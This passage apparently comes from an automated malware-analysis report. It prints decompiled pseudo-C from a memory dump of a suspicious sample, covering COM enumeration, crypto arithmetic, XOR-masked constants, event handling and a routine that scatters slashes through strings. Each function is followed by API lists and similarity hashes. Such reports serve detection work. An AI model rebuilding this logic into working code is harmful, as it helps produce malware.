                            				intOrPtr _t103;
                            				intOrPtr _t109;
                            				void* _t118;
                            				void* _t122;
                            				void* _t123;
                            				intOrPtr _t130;
                            
                            				_t123 = _t122 - 0x3c;
                            				_push( &_v8);
                            				_push(__eax);
                            				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                            				if(_t118 >= 0) {
                            					_t54 = _v8;
                            					_t103 =  *0xcfd2a4; // 0x247a5a8
                            					_t5 = _t103 + 0xcfe038; // 0x3050f485
                            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                            					_t56 = _v8;
                            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                            					if(_t118 >= 0) {
                            						__imp__#2(0xcfc2a8);
                            						_v28 = _t57;
                            						if(_t57 == 0) {
                            							_t118 = 0x8007000e;
                            						} else {
                            							_t60 = _v32;
                            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                            							_t87 = __imp__#6;
                            							_t118 = _t61;
                            							if(_t118 >= 0) {
                            								_t63 = _v24;
                            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                            								if(_t118 >= 0) {
                            									_t130 = _v20;
                            									if(_t130 != 0) {
                            										_t67 = 3;
                            										_v64 = _t67;
                            										_v48 = _t67;
                            										_v56 = 0;
                            										_v40 = 0;
                            										if(_t130 > 0) {
                            											while(1) {
                            												_t68 = _v24;
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												_t123 = _t123;
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												asm("movsd");
                            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                            												if(_t118 < 0) {
                            													goto L16;
                            												}
                            												_t70 = _v8;
                            												_t109 =  *0xcfd2a4; // 0x247a5a8
                            												_t28 = _t109 + 0xcfe0bc; // 0x3050f1ff
                            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                            												if(_t118 >= 0) {
                            													_t75 = _v16;
                            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                            													if(_t118 >= 0 && _v12 != 0) {
                            														_t79 =  *0xcfd2a4; // 0x247a5a8
                            														_t33 = _t79 + 0xcfe078; // 0x76006f
                            														if(lstrcmpW(_v12, _t33) == 0) {
                            															_t83 = _v16;
                            															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                            														}
                            														 *_t87(_v12);
                            													}
                            													_t77 = _v16;
                            													 *((intOrPtr*)( *_t77 + 8))(_t77);
                            												}
                            												_t72 = _v8;
                            												 *((intOrPtr*)( *_t72 + 8))(_t72);
                            												_v40 = _v40 + 1;
                            												if(_v40 < _v20) {
                            													continue;
                            												}
                            												goto L16;
                            											}
                            										}
                            									}
                            								}
                            								L16:
                            								_t65 = _v24;
                            								 *((intOrPtr*)( *_t65 + 8))(_t65);
                            							}
                            							 *_t87(_v28);
                            						}
                            						_t58 = _v32;
                            						 *((intOrPtr*)( *_t58 + 8))(_t58);
                            					}
                            				}
                            				return _t118;
                            			}






































                            APIs
                            • SysAllocString.OLEAUT32(00CFC2A8), ref: 00CF2D13
                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00CF2DF4
                            • SysFreeString.OLEAUT32(00000000), ref: 00CF2E0D
                            • SysFreeString.OLEAUT32(?), ref: 00CF2E3C
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: String$Free$Alloclstrcmp
                            • String ID:
                            • API String ID: 1885612795-0
                            • Opcode ID: 36a79c857f105387d1094dc0ce5c770672bcff8afcf42f4d5e2cc9d0447a5d6a
                            • Instruction ID: 0e7e32d3298221f8ec343dd336d2d3e878037bdcbdb0f185602bea7acae3a5b1
                            • Opcode Fuzzy Hash: 36a79c857f105387d1094dc0ce5c770672bcff8afcf42f4d5e2cc9d0447a5d6a
                            • Instruction Fuzzy Hash: 95515075D00519EFCB04DFA8C9889AEF7BAEF88701B244594EA15EB320D7319D42CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E00CF1721(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				void _v92;
                            				void _v236;
                            				void* _t55;
                            				unsigned int _t56;
                            				signed int _t66;
                            				signed int _t74;
                            				void* _t76;
                            				signed int _t79;
                            				void* _t81;
                            				void* _t92;
                            				void* _t96;
                            				signed int* _t99;
                            				signed int _t101;
                            				signed int _t103;
                            				void* _t107;
                            
                            				_t92 = _a12;
                            				_t101 = __eax;
                            				_t55 = E00CF551C(_a16, _t92);
                            				_t79 = _t55;
                            				if(_t79 == 0) {
                            					L18:
                            					return _t55;
                            				}
                            				_t56 =  *(_t92 + _t79 * 4 - 4);
                            				_t81 = 0;
                            				_t96 = 0x20;
                            				if(_t56 == 0) {
                            					L4:
                            					_t97 = _t96 - _t81;
                            					_v12 = _t96 - _t81;
                            					E00CF11C2(_t79,  &_v236);
                            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00CF6042(_t101,  &_v236, _a8, _t96 - _t81);
                            					E00CF6042(_t79,  &_v92, _a12, _t97);
                            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                            					_t66 = E00CF11C2(_t101,  &E00CFD1B0);
                            					_t103 = _t101 - _t79;
                            					_a8 = _t103;
                            					if(_t103 < 0) {
                            						L17:
                            						E00CF11C2(_a16, _a4);
                            						E00CF18BC(_t79,  &_v236, _a4, _t97);
                            						memset( &_v236, 0, 0x8c);
                            						_t55 = memset( &_v92, 0, 0x44);
                            						goto L18;
                            					}
                            					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                            					do {
                            						if(_v8 != 0xffffffff) {
                            							_push(1);
                            							_push(0);
                            							_push(0);
                            							_push( *_t99);
                            							L00CFB048();
                            							_t74 = _t66 +  *(_t99 - 4);
                            							asm("adc edx, esi");
                            							_push(0);
                            							_push(_v8 + 1);
                            							_push(_t92);
                            							_push(_t74);
                            							L00CFB042();
                            							if(_t92 > 0 || _t74 > 0xffffffff) {
                            								_t74 = _t74 | 0xffffffff;
                            								_v16 = _v16 & 0x00000000;
                            							}
                            						} else {
                            							_t74 =  *_t99;
                            						}
                            						_t106 = _t107 + _a8 * 4 - 0xe8;
                            						_a12 = _t74;
                            						_t76 = E00CF5F2D(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                            						while(1) {
                            							 *_t99 =  *_t99 - _t76;
                            							if( *_t99 != 0) {
                            								goto L14;
                            							}
                            							L13:
                            							_t92 =  &_v92;
                            							if(E00CF901A(_t79, _t92, _t106) < 0) {
                            								break;
                            							}
                            							L14:
                            							_a12 = _a12 + 1;
                            							_t76 = E00CF923D(_t79,  &_v92, _t106, _t106);
                            							 *_t99 =  *_t99 - _t76;
                            							if( *_t99 != 0) {
                            								goto L14;
                            							}
                            							goto L13;
                            						}
                            						_a8 = _a8 - 1;
                            						_t66 = _a12;
                            						_t99 = _t99 - 4;
                            						 *(_a8 * 4 +  &E00CFD1B0) = _t66;
                            					} while (_a8 >= 0);
                            					_t97 = _v12;
                            					goto L17;
                            				}
                            				while(_t81 < _t96) {
                            					_t81 = _t81 + 1;
                            					_t56 = _t56 >> 1;
                            					if(_t56 != 0) {
                            						continue;
                            					}
                            					goto L4;
                            				}
                            				goto L4;
                            			}






















                            APIs
                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00CF17CE
                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00CF17E4
                            • memset.NTDLL ref: 00CF1884
                            • memset.NTDLL ref: 00CF1894
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: memset$_allmul_aulldiv
                            • String ID:
                            • API String ID: 3041852380-0
                            • Opcode ID: 8c3d4d33c7d14ed34bbe674eab9e1db68c9e41f858fa7bcb23a973dbe3331e5e
                            • Instruction ID: bd770c5571d262db3d199a9ac60e4fb3835347f0eba5cb51142a29b15026aa0d
                            • Opcode Fuzzy Hash: 8c3d4d33c7d14ed34bbe674eab9e1db68c9e41f858fa7bcb23a973dbe3331e5e
                            • Instruction Fuzzy Hash: 21418171A0021DEBDB50AFA8CC41BFE7775EF44310F14852AFA1AA7181DB70AE45DB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 39%
                            			E00CF2303(void* __eax) {
                            				char _v8;
                            				void* _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				void* __esi;
                            				intOrPtr _t36;
                            				intOrPtr* _t37;
                            				intOrPtr* _t39;
                            				void* _t53;
                            				long _t58;
                            				void* _t59;
                            
                            				_t59 = __eax;
                            				_t58 = 0;
                            				ResetEvent( *(__eax + 0x1c));
                            				_push( &_v8);
                            				_push(4);
                            				_push( &_v20);
                            				_push( *((intOrPtr*)(_t59 + 0x18)));
                            				if( *0xcfd138() != 0) {
                            					L5:
                            					if(_v8 == 0) {
                            						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                            						L21:
                            						return _t58;
                            					}
                            					 *0xcfd168(0, 1,  &_v12);
                            					if(0 != 0) {
                            						_t58 = 8;
                            						goto L21;
                            					}
                            					_t36 = E00CF8D59(0x1000);
                            					_v16 = _t36;
                            					if(_t36 == 0) {
                            						_t58 = 8;
                            						L18:
                            						_t37 = _v12;
                            						 *((intOrPtr*)( *_t37 + 8))(_t37);
                            						goto L21;
                            					}
                            					_push(0);
                            					_push(_v8);
                            					_push( &_v20);
                            					while(1) {
                            						_t39 = _v12;
                            						_t56 =  *_t39;
                            						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                            						ResetEvent( *(_t59 + 0x1c));
                            						_push( &_v8);
                            						_push(0x1000);
                            						_push(_v16);
                            						_push( *((intOrPtr*)(_t59 + 0x18)));
                            						if( *0xcfd138() != 0) {
                            							goto L13;
                            						}
                            						_t58 = GetLastError();
                            						if(_t58 != 0x3e5) {
                            							L15:
                            							E00CF677C(_v16);
                            							if(_t58 == 0) {
                            								_t58 = E00CF1BFD(_v12, _t59);
                            							}
                            							goto L18;
                            						}
                            						_t58 = E00CF9837( *(_t59 + 0x1c), _t56, 0xffffffff);
                            						if(_t58 != 0) {
                            							goto L15;
                            						}
                            						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                            						if(_t58 != 0) {
                            							goto L15;
                            						}
                            						L13:
                            						_t58 = 0;
                            						if(_v8 == 0) {
                            							goto L15;
                            						}
                            						_push(0);
                            						_push(_v8);
                            						_push(_v16);
                            					}
                            				}
                            				_t58 = GetLastError();
                            				if(_t58 != 0x3e5) {
                            					L4:
                            					if(_t58 != 0) {
                            						goto L21;
                            					}
                            					goto L5;
                            				}
                            				_t58 = E00CF9837( *(_t59 + 0x1c), _t53, 0xffffffff);
                            				if(_t58 != 0) {
                            					goto L21;
                            				}
                            				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                            				goto L4;
                            			}















                            APIs
                            • ResetEvent.KERNEL32(?), ref: 00CF2319
                            • GetLastError.KERNEL32 ref: 00CF2332
                              • Part of subcall function 00CF9837: WaitForMultipleObjects.KERNEL32(00000002,00CFA9FB,00000000,00CFA9FB,?,?,?,00CFA9FB,0000EA60), ref: 00CF9852
                            • ResetEvent.KERNEL32(?), ref: 00CF23AB
                            • GetLastError.KERNEL32 ref: 00CF23C6
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: ErrorEventLastReset$MultipleObjectsWait
                            • String ID:
                            • API String ID: 2394032930-0
                            • Opcode ID: 9ca52acf6e43ad4b810e40da3564ccf78be3bcf0a280d0aaffaa3eb30a2aa5bc
                            • Instruction ID: 03ee2780e6b3b285a0e49bc259271826bb1cc1e6cc152ad43ddfb0f3de935cb7
                            • Opcode Fuzzy Hash: 9ca52acf6e43ad4b810e40da3564ccf78be3bcf0a280d0aaffaa3eb30a2aa5bc
                            • Instruction Fuzzy Hash: BD31E732A0060CEBCB62DBA5CC44F7E7BB9EF84360F254524E621D71A0DB70DA45EB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E00CF2997(signed int _a4, signed int* _a8) {
                            				void* __ecx;
                            				void* __edi;
                            				signed int _t6;
                            				intOrPtr _t8;
                            				intOrPtr _t12;
                            				short* _t18;
                            				void* _t24;
                            				signed int* _t27;
                            				CHAR* _t29;
                            				long _t30;
                            				intOrPtr* _t31;
                            
                            				_t6 =  *0xcfd270; // 0xd448b889
                            				_t31 = _a4;
                            				_a4 = _t6 ^ 0x109a6410;
                            				_t8 =  *0xcfd2a4; // 0x247a5a8
                            				_t3 = _t8 + 0xcfe862; // 0x61636f4c
                            				_t24 = 0;
                            				_t29 = E00CF5FC5(_t3, 1);
                            				if(_t29 != 0) {
                            					_t24 = CreateEventA(0xcfd2a8, 1, 0, _t29);
                            					E00CF677C(_t29);
                            				}
                            				_t12 =  *0xcfd25c; // 0x2000000a
                            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t31 == 0) {
                            					L12:
                            					_t27 = _a8;
                            					if(_t27 != 0) {
                            						 *_t27 =  *_t27 | 0x00000001;
                            					}
                            					_t30 = E00CF8D99(_t31, 0);
                            					if(_t30 == 0 && _t24 != 0) {
                            						_t30 = WaitForSingleObject(_t24, 0x4e20);
                            					}
                            					if(_t27 != 0 && _t30 != 0) {
                            						 *_t27 =  *_t27 & 0xfffffffe;
                            					}
                            					goto L20;
                            				} else {
                            					_t18 = E00CF244A();
                            					if(_t18 != 0) {
                            						goto L12;
                            					}
                            					_push(0x20);
                            					_push( *_t31);
                            					E00CFD110();
                            					if(_t18 != 0) {
                            						 *_t18 = 0;
                            						_t18 = _t18 + 2;
                            					}
                            					_t30 = E00CF66F6(0,  *_t31, _t18, 0);
                            					if(_t30 == 0) {
                            						if(_t24 == 0) {
                            							L22:
                            							return _t30;
                            						}
                            						_t30 = WaitForSingleObject(_t24, 0x4e20);
                            						if(_t30 == 0) {
                            							L20:
                            							if(_t24 != 0) {
                            								CloseHandle(_t24);
                            							}
                            							goto L22;
                            						}
                            					}
                            					goto L12;
                            				}
                            			}














                            APIs
                              • Part of subcall function 00CF5FC5: lstrlen.KERNEL32(00CF5073,00000000,00000000,00000027,00000005,00000000,00000000,00CF56A8,74666F53,00000000,00CF5073,00CFD00C,?,00CF5073), ref: 00CF5FFB
                              • Part of subcall function 00CF5FC5: lstrcpy.KERNEL32(00000000,00000000), ref: 00CF601F
                              • Part of subcall function 00CF5FC5: lstrcat.KERNEL32(00000000,00000000), ref: 00CF6027
                            • CreateEventA.KERNEL32(00CFD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00CF4D6D,?,00000001,?), ref: 00CF29D8
                              • Part of subcall function 00CF677C: HeapFree.KERNEL32(00000000,00000000,00CF9161,00000000,?,?,00000000), ref: 00CF6788
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,00CF4D6D,00000000,00000000,?,00000000,?,00CF4D6D,?,00000001,?,?,?,?,00CF28F1), ref: 00CF2A38
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00CF4D6D,?,00000001,?), ref: 00CF2A66
                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00CF4D6D,?,00000001,?,?,?,?,00CF28F1), ref: 00CF2A7E
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 73268831-0
                            • Opcode ID: 61e22a9f8efc214fde79be0a6422d0352f087ae26f1fef27043c8b341f66ba8e
                            • Instruction ID: e2b8d419598042d684d80d685e40ee28e8a2d5032d2e285a99c73f628b8abb62
                            • Opcode Fuzzy Hash: 61e22a9f8efc214fde79be0a6422d0352f087ae26f1fef27043c8b341f66ba8e
                            • Instruction Fuzzy Hash: 7321073260031EABC7B15BAC9D84B7F77A9EF88710B150625FB62D7164DB70CE01A653
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 40%
                            			E00CF4CBE(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                            				intOrPtr _v12;
                            				void* _v16;
                            				void* _v28;
                            				char _v32;
                            				void* __esi;
                            				void* _t29;
                            				void* _t38;
                            				signed int* _t39;
                            				void* _t40;
                            
                            				_t36 = __ecx;
                            				_v32 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v12 = _a4;
                            				_t38 = E00CF56DD(__ecx,  &_v32);
                            				if(_t38 != 0) {
                            					L12:
                            					_t39 = _a8;
                            					L13:
                            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                            						_t16 =  &(_t39[1]); // 0x5
                            						_t23 = _t16;
                            						if( *_t16 != 0) {
                            							E00CF4DE0(_t23);
                            						}
                            					}
                            					return _t38;
                            				}
                            				if(E00CF576C(0x40,  &_v16) != 0) {
                            					_v16 = 0;
                            				}
                            				_t40 = CreateEventA(0xcfd2a8, 1, 0,  *0xcfd340);
                            				if(_t40 != 0) {
                            					SetEvent(_t40);
                            					Sleep(0xbb8);
                            					CloseHandle(_t40);
                            				}
                            				_push( &_v32);
                            				if(_a12 == 0) {
                            					_t29 = E00CF215A(_t36);
                            				} else {
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_t29 = E00CF6791(_t36);
                            				}
                            				_t41 = _v16;
                            				_t38 = _t29;
                            				if(_v16 != 0) {
                            					E00CF3822(_t41);
                            				}
                            				if(_t38 != 0) {
                            					goto L12;
                            				} else {
                            					_t39 = _a8;
                            					_t38 = E00CF2997( &_v32, _t39);
                            					goto L13;
                            				}
                            			}












                            APIs
                            • CreateEventA.KERNEL32(00CFD2A8,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,00CF28F1,?,00000001,?), ref: 00CF4D0F
                            • SetEvent.KERNEL32(00000000,?,?,?,00CF28F1,?,00000001,?,00000002,?,?,00CF50A1,?), ref: 00CF4D1C
                            • Sleep.KERNEL32(00000BB8,?,?,?,00CF28F1,?,00000001,?,00000002,?,?,00CF50A1,?), ref: 00CF4D27
                            • CloseHandle.KERNEL32(00000000,?,?,?,00CF28F1,?,00000001,?,00000002,?,?,00CF50A1,?), ref: 00CF4D2E
                              • Part of subcall function 00CF215A: WaitForSingleObject.KERNEL32(00000000,?,?,?,00CF4D4E,?,00CF4D4E,?,?,?,?,?,00CF4D4E,?), ref: 00CF2234
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                            • String ID:
                            • API String ID: 2559942907-0
                            • Opcode ID: f16be97f2f6db60ac8023917c2ab66f2995122c1c0fe1e881202e1c71083ed98
                            • Instruction ID: 2dcc3329b7bd3b842196ab5e4e4c9f0289ea1614e3764c95b814d34042dfc17f
                            • Opcode Fuzzy Hash: f16be97f2f6db60ac8023917c2ab66f2995122c1c0fe1e881202e1c71083ed98
                            • Instruction Fuzzy Hash: E5215E7690011DABCB94BFE4C885AFFB7BDAB44390B054526FB21A7100DB349E45DBA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E00CF226B(unsigned int __eax, void* __ecx) {
                            				void* _v8;
                            				void* _v12;
                            				signed int _t21;
                            				signed short _t23;
                            				char* _t27;
                            				void* _t29;
                            				void* _t30;
                            				unsigned int _t33;
                            				void* _t37;
                            				unsigned int _t38;
                            				void* _t41;
                            				void* _t42;
                            				int _t45;
                            				void* _t46;
                            
                            				_t42 = __eax;
                            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                            				_t38 = __eax;
                            				_t30 = RtlAllocateHeap( *0xcfd238, 0, (__eax >> 3) + __eax + 1);
                            				_v12 = _t30;
                            				if(_t30 != 0) {
                            					_v8 = _t42;
                            					do {
                            						_t33 = 0x18;
                            						if(_t38 <= _t33) {
                            							_t33 = _t38;
                            						}
                            						_t21 =  *0xcfd250; // 0x1eaade80
                            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                            						 *0xcfd250 = _t23;
                            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                            						memcpy(_t30, _v8, _t45);
                            						_v8 = _v8 + _t45;
                            						_t27 = _t30 + _t45;
                            						_t38 = _t38 - _t45;
                            						_t46 = _t46 + 0xc;
                            						 *_t27 = 0x2f;
                            						_t13 = _t27 + 1; // 0x1
                            						_t30 = _t13;
                            					} while (_t38 > 8);
                            					memcpy(_t30, _v8, _t38 + 1);
                            				}
                            				return _v12;
                            			}

















                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CF1AC3,00000000,?,?,00CF1EFB,?,031795B0), ref: 00CF2276
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00CF228E
                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00CF1AC3,00000000,?,?,00CF1EFB,?,031795B0), ref: 00CF22D2
                            • memcpy.NTDLL(00000001,?,00000001), ref: 00CF22F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 13b487ffcac2a7b5721eca1ddb097302493769a907956747238c8bdbafa8a6c6
                            • Instruction ID: d7063aed1a9dad7ed09283e188a0fd87c0b724cb94bf3c3dbd2d23307426dbb3
                            • Opcode Fuzzy Hash: 13b487ffcac2a7b5721eca1ddb097302493769a907956747238c8bdbafa8a6c6
                            • Instruction Fuzzy Hash: 8411E972A00119AFC7548BA9DC84FAEBBBEDBC4360B150176F605D7150EB709E05D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E00CF203C(char* __eax) {
                            				char* _t8;
                            				intOrPtr _t12;
                            				char* _t21;
                            				signed int _t23;
                            				char* _t24;
                            				signed int _t26;
                            				void* _t27;
                            
                            				_t21 = __eax;
                            				_push(0x20);
                            				_t23 = 1;
                            				_push(__eax);
                            				while(1) {
                            					_t8 = StrChrA();
                            					if(_t8 == 0) {
                            						break;
                            					}
                            					_t23 = _t23 + 1;
                            					_push(0x20);
                            					_push( &(_t8[1]));
                            				}
                            				_t12 = E00CF8D59(_t23 << 2);
                            				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                            				if(_t12 != 0) {
                            					StrTrimA(_t21, 0xcfc29c);
                            					_t26 = 0;
                            					do {
                            						_t24 = StrChrA(_t21, 0x20);
                            						if(_t24 != 0) {
                            							 *_t24 = 0;
                            							_t24 =  &(_t24[1]);
                            							StrTrimA(_t24, 0xcfc29c);
                            						}
                            						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                            						_t26 = _t26 + 1;
                            						_t21 = _t24;
                            					} while (_t24 != 0);
                            					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                            				}
                            				return 0;
                            			}










                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,031795AC,?,00CF5068,?,00CF9777,031795AC,?,00CF5068), ref: 00CF2056
                            • StrTrimA.SHLWAPI(?,00CFC29C,00000002,?,00CF5068,?,00CF9777,031795AC,?,00CF5068), ref: 00CF2075
                            • StrChrA.SHLWAPI(?,00000020,?,00CF5068,?,00CF9777,031795AC,?,00CF5068), ref: 00CF2080
                            • StrTrimA.SHLWAPI(00000001,00CFC29C,?,00CF5068,?,00CF9777,031795AC,?,00CF5068), ref: 00CF2092
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Trim
                            • String ID:
                            • API String ID: 3043112668-0
                            • Opcode ID: 19f3e750dbce78425e49e65f3785fbc62a72621b19d3af8d8aea1220c92fe70c
                            • Instruction ID: 525261ed44deb55e4d6f44b65b62b496e4860add788b1f14c37e68e381bc4172
                            • Opcode Fuzzy Hash: 19f3e750dbce78425e49e65f3785fbc62a72621b19d3af8d8aea1220c92fe70c
                            • Instruction Fuzzy Hash: AD01B57260531A6BC2319F6A8C49F3BBFA8EB95BA0F110519FA56D7241DF61CC01D2A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E00CF5FC5(intOrPtr _a4, intOrPtr _a8) {
                            				char _v20;
                            				void* _t8;
                            				void* _t13;
                            				void* _t16;
                            				char* _t18;
                            				void* _t19;
                            
                            				_t19 = 0x27;
                            				_t1 =  &_v20; // 0x74666f53
                            				_t18 = 0;
                            				E00CF60BE(_t8, _t1);
                            				_t16 = E00CF8D59(_t19);
                            				if(_t16 != 0) {
                            					_t3 =  &_v20; // 0x74666f53
                            					_t13 = E00CF2A8E(_t3, _t16, _a8);
                            					if(_a4 != 0) {
                            						__imp__(_a4);
                            						_t19 = _t13 + 0x27;
                            					}
                            					_t18 = E00CF8D59(_t19);
                            					if(_t18 != 0) {
                            						 *_t18 = 0;
                            						if(_a4 != 0) {
                            							__imp__(_t18, _a4);
                            						}
                            						__imp__(_t18, _t16);
                            					}
                            					E00CF677C(_t16);
                            				}
                            				return _t18;
                            			}









                            APIs
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                              • Part of subcall function 00CF2A8E: wsprintfA.USER32 ref: 00CF2AEA
                            • lstrlen.KERNEL32(00CF5073,00000000,00000000,00000027,00000005,00000000,00000000,00CF56A8,74666F53,00000000,00CF5073,00CFD00C,?,00CF5073), ref: 00CF5FFB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00CF601F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00CF6027
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                            • String ID: Soft
                            • API String ID: 393707159-3753413193
                            • Opcode ID: b61494c52c1b002bf01b979ad2f6a2527f441675ed218f7ba919a219ba28b780
